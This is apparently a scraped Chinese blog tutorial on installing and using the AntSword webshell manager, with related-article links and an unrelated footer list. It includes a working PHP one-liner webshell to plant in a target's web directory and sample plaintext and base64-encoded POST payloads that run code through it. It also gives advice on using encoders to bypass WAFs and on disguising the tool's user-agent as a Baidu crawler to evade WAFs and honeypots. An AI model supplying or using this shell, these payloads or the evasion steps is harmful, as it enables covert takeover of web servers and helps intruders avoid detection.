中国蚁剑AntSword
中国蚁剑AntSword
中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。
参考文档
中国蚁剑下载、安装、使用教程_Sumarua的博客-CSDN博客_中国蚁剑怎么使用
中国蚁剑AntSword:开源的跨平台WebShell管理工具 - 体验盒子 - 不再关注网络安全
核心功能
- Shell代理功能
- Shell管理
- 文件管理
- 虚拟终端
- 数据库管理
- 插件市场
- 插件开发
开发版本针对有一定编程基础的开发者,你可以根据阅读文档或者分析源码了解熟悉整个应用的执行流程,然后便可随意对代码进行修改增强个性化自定义,真正打造出属于自己的一把宝剑!
中国蚁剑下载
注意:我们下载的时候需要下载两个部分,一个是项目核心源码”antSword“,另一个是加载器;加载器则分为三个版本:Mac、Windows、Linux。
中国蚁剑安装
1、以Windows版本64位来示例了,我们解压“AntSword-Loader-v4.0.3-win32-x64.zip”后,双击“AntSword.exe”;
2.第一次安装项目需要先初始化,如果你已经下载了核心源码,就选择项目源码的文件夹。(如果只下载了加载器,选择一个空文件夹,加载器会自动帮你下载核心项目源码)。
2、等初始化完成后,再双击“AntSword.exe”即可正常启动。
中国蚁剑使用
1、添加一个shell
首先:右键单击 - 添加数据;
其次:输入URL地址,连接密码以及编码设置。PHP语言推荐编辑器使用chr加密;
再次:如果需要自己写编码器的加密类型,可以按下图来操作:
从次:还可以配置shell的请求信息和post内容;
最后:还可以配置全局代理;
2、插件
3、关于编码器
编码器是这个程序的过人之处,用编码器加密可以轻松绕过WAF。
不妨,我们来对比一下默认不使用编码传输和base64编码传输的区别:
明文传输,post内容为:
ant=@ini_set("display_errors", "0");@set_time_limit(0);echo "3e231";$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D} ";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.=" ";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.=" {$s}";echo $R;;echo "8e51f";die();1
base64加密传输,post内容为:
_0x4ee8506e59871=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZWNobyAiNzk1ODAiOyREPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTtpZigkRD09IiIpJEQ9ZGlybmFtZSgkX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl0pOyRSPSJ7JER9CSI7aWYoc3Vic3RyKCRELDAsMSkhPSIvIil7Zm9yZWFjaChyYW5nZSgiQyIsIloiKWFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9ZWxzZXskUi49Ii8iO30kUi49IgkiOyR1PShmdW5jdGlvbl9leGlzdHMoInBvc2l4X2dldGVnaWQiKSk/QHBvc2l4X2dldHB3dWlkKEBwb3NpeF9nZXRldWlkKCkpOiIiOyRzPSgkdSk/JHVbIm5hbWUiXTpAZ2V0X2N1cnJlbnRfdXNlcigpOyRSLj1waHBfdW5hbWUoKTskUi49Igl7JHN9IjtlY2hvICRSOztlY2hvICIwOWE3ZSI7ZGllKCk7&ant=@eval(@base64_decode($_POST[_0x4ee8506e59871]));1
注意:其中,ant参数名称是shell密码。再来看看chr编码传输,完全就全部编码了。
4、user-agent修改
要注意的是,软件默认的user-agent是:User-Agent: antSword/v2.0;而且大部分人都不会去自定义useragent,这就给waf和蜜罐白白送了一个特征,所以我们要修改一下源代码:
修改项目路径:
antSword\modules\request.js (修改const USER_AGENT = 'antSword/v2.1';这一行代码!)
antSword\modules\update.js (有两处要修改;可搜索“antSword/v2.0”来找到这两行代码!)
我这里是把antSword/v2.0或antSword/v2.1修改为了Baiduspider-image,我改成了百度图片蜘蛛。
5、使用
以PHP为例蚁剑教程,在目标服务器的Web目录下新建一个Shell,名为ant.php,内容:
<?phpeval($_POST['ant']);?>
打开AntSword,在空白位置单击「鼠标右键」,弹出菜单中选择 「添加数据」,在添加数据界面中,添加连接信息。然后点击 「添加」按钮,即可在数据管理中看到刚才添加的 Shell,双击刚才添加的 Shell,即可看到文件管理界面,右键会更到更多功能。使用大致和菜刀类似。使用中你会发现更多中国蚁剑AntSword的使用技巧。
中国蚁剑AntSword相关推荐
- 中国蚁剑AntSword反制 RCE漏洞复现 windows环境上反弹shell 吊打攻击你的黑客
中国蚁剑(AntSword) 是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员. WebShell WebShell可以理解为网页中的木马程序,通过植 ...
- 中国蚁剑(antSword)下载、安装、安装出现的问题、使用教程
前言: 中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员. 通俗的讲:中国蚁剑是 一 款比菜刀还牛的shell控制端软件. 中国蚁剑推崇模块化 ...
- 攻防兼备:中国蚁剑使用指南及特征流量
中国蚁剑是菜刀的升级版本,线现下主流的Webshell连接工具之一,有着较广泛的使用,本篇文章会教给大家蚁剑的使用方法以及不同加密方式的流量特征,兼顾攻防两端. 蚁剑下载安装参考:中国蚁剑(antSw ...
- AntSword 中国蚁剑的下载安装配置(附下载文件)
文章更新于:2020-04-11 按照惯例,需要的文件附上链接放在文首. 文件一: antSword-2.1.8.1.zip.7z 文件大小: 14.3 MB 下载链接: 中国蚁剑 v2.1.8.1 ...
- 中国蚁剑的下载、安装与使用
一.中国蚁剑下载.安装 百度网盘链接:https://pan.baidu.com/s/1Fl0_hFtCtfUgcNIOwKeGEA 提取码:nvjc 共包含2个文件: antSword.zip An ...
- 中国蚁剑的下载以及安装教程
一,中国蚁剑下载 唯一官方github下载地址: AntSwordProject · GitHub 加载器: GitHub - AntSwordProject/AntSword-Loader: Ant ...
- 中国蚁剑安装使用教程
中国蚁剑安装使用教程 前言 一.中国蚁剑安装 二.中国蚁剑使用 2.1中国蚁剑连接木马 2.2中国蚁剑设置代理 2.3中国蚁剑参数设置 2.4中国蚁剑其他使用 三. 中国蚁剑绕过Waf 3.1 编码绕 ...
- 【网络安全】文件上传漏洞及中国蚁剑安装
文件上传漏洞 描述 中国蚁剑安装 1. 官网下载源码和加载器 2.解压至同一目录并 3.安装 4.可能会出现的错误 文件上传过程 必要条件 代码示例 dvwa靶场攻击示例 1.书写一句话密码进行上传 ...
- 中国蚁剑下载、安装、使用教程
文章目录 中国蚁剑下载.安装.使用教程 一.中国蚁剑下载 二.中国蚁剑安装 三.中国蚁剑使用 1.添加一个shell 2.插件 3.关于编码器 4.user-agent修改 中国蚁剑下载.安装.使用教 ...
最新文章
- 生产环境WEB服务管理脚本之日志检测脚本
- Python:使用ctypes库调用外部DLL 数据类型对应
- 互联网1分钟 |1217
- 如何在Raspberry Pi上设置两因素身份验证
- 打破双亲委派么,怎么打破_质量保证被打破。 这就是我们如何使其像其他所有东西一样敏捷。...
- dw相对路径怎么改_密云ETL怎么收费
- 用python和sympy库解决方程组问题_Python语言 SymPy库数学方程问题——线性方程组篇...
- Netty Reactor线程模型与EventLoop详解
- python删除长目录_python中删除目录名两端
- UVa 11419 SAM I AM
- 苹果自带的清理软件_苹果清理软件哪个好,哪个更适合自己 - 単子
- 【设计】计数(一)基数计数
- 双动道岔计算机控制系统,车站信号自动控制习题.doc
- 【BUG】win10下VS中出现LINK : fatal error LNK1104: cannot open file “xx/xx.exe“的问题
- 试炼四:switch选择结构
- RIDE 图标点击没反应
- 【Git】Git修改 commit 的信息
- Linux基础知识学习笔记-----crack_the_WiFi_secret
- OAF控件及常见问题汇总
- Multiview RGB-D Dataset for Object Instance Detection*(译文)
热门文章
- Nginx解决配置SSL证书报错:nginx: [emerg] unknown directive “ssl_certificate1“ in /usr/local/nginx/conf/ngi...
- 速美时代,让美丽走进智能共享时代!
- 2020年第十一届C/C++ B组第二场蓝桥杯省赛真题
- 爬虫实战,抓取论坛帖子内容
- SAP MM模块-实施顾问岗位-面试手册-面试介绍
- BBB(Beaglebone Black)找不到 /sys/devices/bone_capemgr.*
- 浅论我国机场鸟防管理现状及完善途径
- CBNData数据盛典:理性数据+感性消费透视中国互联网商业
- Matplotlib指令之折线图散点图
- Self-supervised Video Transformer 阅读